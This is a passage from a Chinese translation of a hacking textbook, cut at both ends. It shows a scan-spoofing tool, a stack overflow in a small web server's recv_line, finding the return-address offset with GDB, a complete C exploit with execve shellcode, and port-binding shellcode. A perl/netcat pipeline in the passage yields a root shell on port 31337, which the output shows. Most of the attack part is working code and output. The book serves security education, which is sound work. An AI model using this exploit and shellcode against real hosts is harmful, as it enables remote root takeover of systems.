   if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
      fatal("pcap_compile failed");

   if(pcap_setfilter(pcap_hdl, &filter) == -1)
      fatal("pcap_setfilter failed");
}

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char
*packet) {
   u_char *pkt_data;
   struct libnet_ip_hdr *IPhdr;
   struct libnet_tcp_hdr *TCPhdr;
   struct data_pass *passed;
   int bcount;

   passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct

   IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);
   TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);

   libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header 
      IPTOS_LOWDELAY,                 // IP tos 
      libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 
      0,                              // Frag stuff 
      libnet_get_prand(LIBNET_PR8),   // TTL (randomized) 
      IPPROTO_TCP,                    // Transport protocol 
      *((u_long *)&(IPhdr->ip_dst)),  // Source IP (pretend we are dst) 
      *((u_long *)&(IPhdr->ip_src)),  // Destination IP (send back to src) 
      NULL,                           // Payload (none) 
      0,                              // Payload length 
      passed->packet);                // Packet header memory 

   libnet_build_tcp(htons(TCPhdr->th_dport),// Source TCP port (pretend we are dst) 
      htons(TCPhdr->th_sport),        // Destination TCP port (send back to src) 
      htonl(TCPhdr->th_ack),          // Sequence number (use previous ack) 
      htonl((TCPhdr->th_seq) + 1),    // Acknowledgement number (SYN's seq # + 1)
      TH_SYN | TH_ACK,                // Control flags (RST flag set only) 
      libnet_get_prand(LIBNET_PRu16), // Window size (randomized) 
      0,                              // Urgent pointer
      NULL,                           // Payload (none)
      0,                              // Payload length 
      (passed->packet) + LIBNET_IP_H);// Packet header memory 

   if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

   bcount = libnet_write_ip(passed->libnet_handle, passed->packet,
 LIBNET_IP_H+LIBNET_TCP_H);
   if (bcount < LIBNET_IP_H + LIBNET_TCP_H)
      libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.");
   printf("bing!\n"); 
}

上述代码中有几个棘手的部分，但你应该能够理解所有内容。当程序编译并执行时，它将隐藏作为第一个参数给出的 IP 地址，除了作为剩余参数提供的现有端口列表之外。

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o shroud shroud.c -lnet -lpcap
reader@hacking:~/booksrc $ sudo ./shroud 192.168.42.72 22 80
DEBUG: filter string is 'dst host 192.168.42.72 and tcp[tcpflags] & tcp-syn != 0 and
tcp[tcpflags] & tcp-ack = 0 and not (dst port 22 or dst port 80)'

当 shroud 运行时，任何端口扫描尝试都会显示所有端口都是开放的。

matrix@euclid:~ $ sudo nmap -sS 192.168.0.189

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on  (192.168.0.189):
Port       State       Service
1/tcp      open        tcpmux
2/tcp      open        compressnet
3/tcp      open        compressnet
4/tcp      open        unknown
5/tcp      open        rje
6/tcp      open        unknown
7/tcp      open        echo
8/tcp      open        unknown
9/tcp      open        discard
10/tcp     open        unknown
11/tcp     open        systat
12/tcp     open        unknown
13/tcp     open        daytime
14/tcp     open        unknown
15/tcp     open        netstat
16/tcp     open        unknown
17/tcp     open        qotd
18/tcp     open        msp
19/tcp     open        chargen
20/tcp     open        ftp-data
21/tcp     open        ftp
`22/tcp     open        ssh`
23/tcp     open        telnet
24/tcp     open        priv-mail
25/tcp     open        smtp

[ output trimmed ]

32780/tcp  open        sometimes-rpc23
32786/tcp  open        sometimes-rpc25
32787/tcp  open        sometimes-rpc27
43188/tcp  open        reachout
44442/tcp  open        coldfusion-auth
44443/tcp  open        coldfusion-auth
47557/tcp  open        dbbrowse
49400/tcp  open        compaqdiag
54320/tcp  open        bo2k
61439/tcp  open        netprowler-manager
61440/tcp  open        netprowler-manager2
61441/tcp  open        netprowler-sensor
65301/tcp  open        pcanywhere

Nmap run completed -- 1 IP address (1 host up) scanned in 37 seconds 
matrix@euclid:~ $

实际上运行的服务只有一个，即 22 号端口上的 ssh，但它隐藏在假阳性之中。一个专门的攻击者可以简单地 telnet 到每个端口来检查标语，但这种技术可以很容易地扩展到伪造标语。

伸出援手，黑客他人

网络编程倾向于移动许多内存块，并且类型转换很重。你自己已经看到了一些类型转换是多么疯狂。在这种混乱中，错误会蓬勃发展。而且由于许多网络程序需要以 root 身份运行，这些小错误可能会成为关键漏洞。本章代码中存在这样一个漏洞。你注意到它了吗？

伸出援手，黑客他人

来自 hacking-network.h

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-of-line byte sequence
#define EOL_SIZE 2
   unsigned char *ptr;
   int eol_matched = 0;

   ptr = dest_buffer;

   while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte.
      if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
         eol_matched++;
         if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
            *(ptr+1-EOL_SIZE) = '\0'; // terminate the string.
            return strlen(dest_buffer); // Return bytes recevied.
         }
      } else {
         eol_matched = 0;
      }
      ptr++; // Increment the pointer to the next byte.
   }
   return 0; // Didn't find the end-of-line characters. 
}

在 hacking-network.h 中的recv_line()函数有一个小的遗漏错误——没有限制长度的代码。这意味着如果接收的字节超过dest_buffer的大小，就会溢出。tinyweb 服务器程序以及使用此函数的任何其他程序都容易受到攻击。

使用 GDB 分析

要利用 tinyweb.c 程序中的漏洞，我们只需要发送会策略性地覆盖返回地址的数据包。首先，我们需要知道从我们控制的缓冲区开始到存储的返回地址的偏移量。使用 GDB，我们可以分析编译后的程序以找到这个偏移量；然而，有一些细微的细节可能会导致复杂的问题。例如，程序需要 root 权限，因此调试器必须以 root 身份运行。但是使用 sudo 或以 root 的环境运行会改变堆栈，这意味着在调试器运行二进制文件时看到的地址与正常运行时的地址不匹配。还有其他一些细微的差异可能会在调试器中像这样移动内存，造成不一致，难以追踪。根据调试器的显示，一切看起来都应该是正常的；然而，当在调试器外运行时，由于地址不同，攻击会失败。

解决这个问题的优雅方法是连接到已经运行的进程。在下面的输出中，GDB 用于连接到另一个终端中启动的已经运行的 tinyweb 进程。使用 -g 选项重新编译源代码以包含 GDB 可以应用于运行进程的调试符号。

reader@hacking:~/booksrc $ ps aux | grep tinyweb
root     13019  0.0  0.0   1504   344 pts/0    S+   20:25   0:00 ./tinyweb
reader   13104  0.0  0.0   2880   748 pts/2    R+   20:27   0:00 grep tinyweb
reader@hacking:~/booksrc $ gcc -g tinyweb.c 
reader@hacking:~/booksrc $ sudo gdb -q --pid=13019 --symbols=./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 13019
/cow/home/reader/booksrc/tinyweb: No such file or directory.
A program is being debugged already.  Kill it? (y or n) n
Program not killed.
(gdb) bt
#0  0xb7fe77f2 in ?? ()
#1  0xb7f691e1 in ?? ()
#2  0x08048ccf in main () at tinyweb.c:44
(gdb) list 44
39         if (listen(sockfd, 20) == -1)
40            fatal("listening on socket");
41
42         while(1) {   // Accept loop
43            sin_size = size of(struct sockaddr_in);
44            `new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);`
45            if(new_sockfd == -1)
46               fatal("accepting connection");
47
48            handle_connection(new_sockfd, &client_addr);
(gdb) list handle_connection
53      /* This function handles the connection on the passed socket from the
54       * passed client address.  The connection is processed as a web request
55       * and this function replies over the connected socket.  Finally, the 
56       * passed socket is closed at the end of the function.
57       */
58      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
59         unsigned char *ptr, request[500], resource[500];
60         int fd, length;
61
62         length = recv_line(sockfd, request);
(gdb) break 62
Breakpoint 1 at 0x8048d02: file tinyweb.c, line 62.
(gdb) cont 
Continuing.

连接到正在运行的进程后，堆栈跟踪显示程序当前在 main() 中，等待连接。在 62 行的第一次 recv_line() 调用处设置断点 () 后，程序被允许继续执行。此时，必须通过在另一个终端中使用 wget 或浏览器发起网络请求来推进程序的执行。然后 handle_connection() 中的断点将被触发。

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb.c:62
62         length = recv_line(sockfd, request);
(gdb) x/x request 
0xbffff5c0:     0x00000000
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb.c:62
#1  0x08048cf6 in main () at tinyweb.c:48
(gdb) x/16xw request+500
0xbffff7b4:     0xb7fd5ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff7c4:     0xb7ff9300      0xb7fd5ff4      0xbffff7e0      0xb7f691c0
0xbffff7d4:     0xb7fd5ff4      0xbffff848      0x08048cf6      0x00000004
0xbffff7e4:     0xbffff810      0xbffff80c      0xbffff834      0x00000004
(gdb) x/x 0xbffff7d4+8
0xbffff7dc:     0x08048cf6
(gdb) p 0xbffff7dc - 0xbffff5c0
$1 = 540
(gdb) p /x 0xbffff5c0 + 200
$2 = 0xbffff688
(gdb) quit
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019 
reader@hacking:~/booksrc $

在断点处，请求缓冲区从 0xbfffff5c0 开始。bt 命令的堆栈跟踪显示从 handle_connection() 返回的地址是 0x08048cf6。由于我们知道局部变量通常在堆栈上的布局，我们知道请求缓冲区位于帧的末尾附近。这意味着存储的返回地址应该在堆栈的末尾附近这个 500 字节缓冲区的某个位置。既然我们已经知道了要查找的大致区域，快速检查显示存储的返回地址在 0xbffff7dc ()。一点数学计算表明存储的返回地址距离请求缓冲区的开始有 540 字节。然而，缓冲区开头附近的一些字节可能会被函数的其余部分破坏。记住，我们只有在函数返回后才能控制程序。为了解决这个问题，最好只避免缓冲区的开头。跳过前 200 字节应该是安全的，同时为剩余的 300 字节留出足够的空间用于 shellcode。这意味着 0xbffff688 是目标返回地址。

几乎只有手榴弹才有效

以下针对 tinyweb 程序的漏洞利用使用了 GDB 计算出的偏移量和返回地址覆盖值。它用空字节填充漏洞缓冲区，因此写入的内容将自动以 null 终止。然后它用 NOP 指令填充前 540 个字节。这建立了 NOP 滑梯并填充缓冲区直到返回地址覆盖位置。然后整个字符串以'\r\n'行终止符结束。

tinyweb_exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "hacking.h"
#include "hacking-network.h"

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";  // Standard shellcode

#define OFFSET 540
#define RETADDR 0xbffff688

int main(int argc, char *argv[]) {
   int sockfd, buflen;
   struct hostent *host_info;
   struct sockaddr_in target_addr;
   unsigned char buffer[600];

   if(argc < 2) {
      printf("Usage: %s <hostname>\n", argv[0]);
      exit(1);
   }

   if((host_info = gethostbyname(argv[1])) == NULL)
      fatal("looking up hostname");

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   target_addr.sin_family = AF_INET;
   target_addr.sin_port = htons(80);
   target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
   memset(&(target_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
      fatal("connecting to target server");

   bzero(buffer, 600);                      // Zero out the buffer.
   memset(buffer, '\x90', OFFSET);          // Build a NOP sled.
   *((u_int *)(buffer + OFFSET)) = RETADDR; // Put the return address in
   memcpy(buffer+300, shellcode, strlen(shellcode)); // shellcode.
   strcat(buffer, "\r\n");                  // Terminate the string.
   printf("Exploit buffer:\n");
   dump(buffer, strlen(buffer));  // Show the exploit buffer.
   send_string(sockfd, buffer);   // Send exploit buffer as an HTTP request.

   exit(0);
}

当这个程序编译后，它可以远程利用运行 tinyweb 程序的宿主，欺骗它们运行 shellcode。漏洞利用还会在发送之前输出漏洞缓冲区的字节。在下面的输出中，tinyweb 程序在不同的终端中运行，漏洞利用被测试于它。以下是攻击者终端的输出：

reader@hacking:~/booksrc $ gcc tinyweb_exploit.c 
reader@hacking:~/booksrc $ ./a.out 127.0.0.1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 31 c0 31 db | ............1.1.
31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 2f 2f 73 68 | 1......j.XQh//sh
68 2f 62 69 6e 89 e3 51 89 e2 53 89 e1 cd 80 90 | h/bin..Q..S.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf | ................
0d 0a                                           | .. 
reader@hacking:~/booksrc $

回到运行 tinyweb 程序的终端，输出显示漏洞缓冲区已被接收并且 shellcode 被执行。这将提供一个 rootshell，但仅限于运行服务器的控制台。不幸的是，我们不在控制台，所以这对我们没有任何帮助。在服务器控制台上，我们看到以下内容：

reader@hacking:~/booksrc $ ./tinyweb
Accepting web requests on port 80
Got request from 127.0.0.1:53908 "GET / HTTP/1.1"
        Opening './webroot/index.html'   200 OK
Got request from 127.0.0.1:40668 "GET /image.jpg HTTP/1.1"
        Opening './webroot/image.jpg'    200 OK
Got request from 127.0.0.1:58504 
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣ 1␣ 1␣␣␣  j

                                         XQh//shh/bin␣␣S ␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣"
 NOT HTTP! 
sh-3.2#

漏洞确实存在，但在这个情况下 shellcode 并没有做我们想要的事情。由于我们不在控制台，shellcode 只是一个自包含的程序，设计用来接管另一个程序以打开 shell。一旦控制了程序的执行指针，注入的 shellcode 就可以做任何事情。有各种不同类型的 shellcode 可以在不同情况下（或有效载荷）中使用。即使不是所有的 shellcode 实际上都会启动一个 shell，但它仍然通常被称为 shellcode。

端口绑定 Shellcode

当利用远程程序时，在本地启动一个 shell 是没有意义的。端口绑定 shellcode 会在特定端口上监听 TCP 连接并远程提供 shell。假设你已经准备好了端口绑定 shellcode，使用它只需替换掉漏洞中定义的 shellcode 字节。端口绑定 shellcode 包含在将绑定到端口 31337 的 LiveCD 中。下面的输出显示了这些 shellcode 字节。

reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ hexdump -C portbinding_shellcode
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 52 66 68  7a 69 66 53 89 e1 6a 10  |.jfXCRfhzifS..j.|
00000020  51 56 89 e1 cd 80 b0 66  43 43 53 56 89 e1 cd 80  |QV.....fCCSV....|
00000030  b0 66 43 52 52 56 89 e1  cd 80 93 6a 02 59 b0 3f  |.fCRRV.....j.Y.?|
00000040  cd 80 49 79 f9 b0 0b 52  68 2f 2f 73 68 68 2f 62  |..Iy...Rh//shh/b|
00000050  69 6e 89 e3 52 89 e2 53  89 e1 cd 80              |in..R..S....|
0000005c
reader@hacking:~/booksrc $ od -tx1 portbinding_shellcode | cut -c8-80 | sed -e 's/ /\\x/g'
\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80
\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10
\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80
\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f
\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80

reader@hacking:~/booksrc $

经过一些快速格式化后，这些字节被交换到 tinyweb_exploit.c 程序的 shellcode 字节中，从而得到 tinyweb_exploit2.c。下面的新 shellcode 行显示如下。

New Line from tinyweb_exploit2.c

char shellcode[]=
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
// Port-binding shellcode on port 31337

当这个漏洞利用编译并运行在运行 tinyweb 服务器的宿主上时，shellcode 会在端口 31337 上监听 TCP 连接。在下面的输出中，使用了一个名为 nc 的程序来连接到 shell。这个程序是 netcat（简称nc），它就像那个 cat 程序，但通过网络工作。我们不能使用 telnet 来连接，因为它会自动以'\r\n'终止所有输出行。下面的输出显示了漏洞利用的结果。传递给 netcat 的-vv命令行选项只是为了使其更详细。

reader@hacking:~/booksrc $ gcc tinyweb_exploit2.c 
reader@hacking:~/booksrc $ ./a.out 127.0.0.1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 | ............jfX.
31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1.CRj.j......jfX
43 52 66 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 | CRfhzifS..j.QV..
cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 | ...fCCSV.....fCR
52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV.....j.Y.?..Iy
f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 | ...Rh//shh/bin..
52 89 e2 53 89 e1 cd 80 90 90 90 90 90 90 90 90 | R..S............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf | ................
0d 0a                                           | ..
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root
ls -l /etc/passwd 
-rw-r--r-- 1 root root 1545 Sep  9 16:24 /etc/passwd

即使远程 shell 不会显示提示符，它仍然接受命令并通过网络返回输出。

类似于 netcat 这样的程序可以用于许多其他事情。它被设计成像控制台程序一样工作，允许标准输入和输出通过管道和重定向。使用 netcat 和文件中的端口绑定 shellcode，相同的攻击可以在命令行上执行。

reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ echo $((540+4 - 300 - 92))
152
reader@hacking:~/booksrc $ echo $((152 / 4))
38
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300';
> cat portbinding_shellcode 
> perl -e 'print "\x88\xf6\xff\xbf"x38 . \r\n"')

"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣ jfX␣1␣CRj j ␣␣ ␣␣jfXC
RfhzifS␣␣j QV␣␣ ␣fCCSV␣␣ ␣fCRRV␣␣ ␣j Y␣? Iy␣␣
                                            Rh//shh/bin␣␣R␣␣S␣␣ ␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode; 
perl -e 'print "\x88\xf6\xff\xbf"x38 . "\r\n"') | nc -v -w1 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -v 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami 
root

在上面的输出中，首先显示了端口绑定 shellcode 的长度为 92 字节。返回地址位于缓冲区开始处的 540 字节处，因此，使用 300 字节的 NOP sled 和 92 字节的 shellcode，到返回地址覆盖处有 152 字节。这意味着如果目标返回地址在缓冲区末尾重复 38 次，最后一个应该完成覆盖。最后，缓冲区以'\r\n'结束。构建缓冲区的命令用括号分组，以便将缓冲区管道输入到 netcat。netcat 连接到 tinyweb 程序并发送缓冲区。shellcode 运行后，需要通过按 CTRL-C 来退出 netcat，因为原始的套接字连接仍然打开。然后，再次使用 netcat 连接到绑定在端口 31337 上的 shell。

第 0x500 章。脚本代码

到目前为止，我们攻击中使用的脚本代码只是一串复制粘贴的字节。我们看到了用于本地攻击的标准 shell 启动脚本代码和用于远程攻击的端口绑定脚本代码。脚本代码有时也被称为攻击有效载荷，因为这些自包含的程序在程序被黑客攻击后执行实际工作。脚本代码通常启动一个 shell，因为这是一种优雅的控制权移交方式；但它可以做任何程序能做的事情。

不幸的是，对于许多黑客来说，脚本故事在复制粘贴字节的地方就结束了。这些黑客只是触及了可能性的表面。定制的脚本代码让你对被利用的程序有绝对的控制权。也许你希望你的脚本代码向 /etc/passwd 添加管理员账户，或者自动从日志文件中删除行。一旦你学会了如何编写自己的脚本代码，你的攻击手段就只受你的想象力限制了。此外，编写脚本代码可以培养汇编语言技能，并运用许多值得了解的攻击技术。

汇编与 C

脚本字节实际上是特定架构的机器指令，因此脚本是用汇编语言编写的。在汇编语言中编写程序与在 C 语言中编写不同，但许多原则是相似的。操作系统在内核中管理诸如输入、输出、进程控制、文件访问和网络通信等事务。编译后的 C 程序最终通过向内核发出系统调用来执行这些任务。不同的操作系统有不同的系统调用集。

在 C 语言中，标准库用于方便和可移植性。一个使用 printf() 输出字符串的 C 程序可以编译成许多不同的系统，因为库知道各种架构的适当系统调用。在 x86 处理器上编译的 C 程序将产生 x86 汇编语言。

根据定义，汇编语言已经针对特定的处理器架构进行了特定化，因此不可移植。没有标准库；相反，必须直接调用内核系统调用。为了开始我们的比较，让我们先写一个简单的 C 程序，然后将其重写为 x86 汇编。

汇编与 C

helloworld.c

#include <stdio.h>
int main() {
  printf("Hello, world!\n");
  return 0;
}

当编译后的程序运行时，执行流程会通过标准 I/O 库，最终通过系统调用将字符串 Hello, world! 写入屏幕。strace 程序用于跟踪程序的系统调用。在编译好的 helloworld 程序上使用它，它会显示该程序做出的每一个系统调用。

reader@hacking:~/booksrc $ gcc helloworld.c
reader@hacking:~/booksrc $ strace ./a.out
execve("./a.out", ["./a.out"], [/* 27 vars */]) = 0
brk(0)                                  = 0x804a000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=61323, ...}) = 0
mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
